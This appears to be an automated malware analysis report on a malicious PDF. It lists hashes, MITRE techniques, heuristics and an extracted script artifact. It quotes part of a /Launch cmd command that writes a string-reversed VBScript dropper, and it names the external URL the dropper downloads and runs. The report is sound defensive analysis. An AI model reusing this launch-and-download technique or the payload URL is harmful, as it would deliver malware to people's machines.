PDF malware analysis — malicious · d2bf93303e869329

MALICIOUS

PDF

810 B

MD5: 4695990d28da7f724c1f3e4fc0045596 SHA-1: b0a8316881e488460ff15ab3492d053066657235 SHA-256: d2bf93303e869329e14d001e3c7a4a6c8bd8dbaf68bf45d54bfb8adbd0ca598c

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains a launch action that executes a command. This command echoes a VBScript payload to a file named 'm.vbs' and then attempts to execute it. The VBScript payload is obfuscated using string reversal for 'Scripting.FileSystemObject' and is designed to download and execute content from the URL http://majestic-3.in/phpbb/image2/tmp/m.vbs.

Heuristics 4

Launch action high PDF_LAUNCH

PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
/Launch action target: cmd high PDF_LAUNCH_COMMAND

PDF /Launch action specifies an executable target with parameters '/c echo B="m.vbs":With CreateObject(StrReverse("PTTHLMX.2LMXSM"'.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://majestic-3.in/phpbb/image2/tmp/m.vbs

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`embedded_pdf_script_0000006f.bin` `ad55c8e83a5896a04b2012c676820daeab2b84cc539e444c6366e79f55a571c5`	pdf-embedded-script	PDF decompressed stream script payload at offset 0x6F	63 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.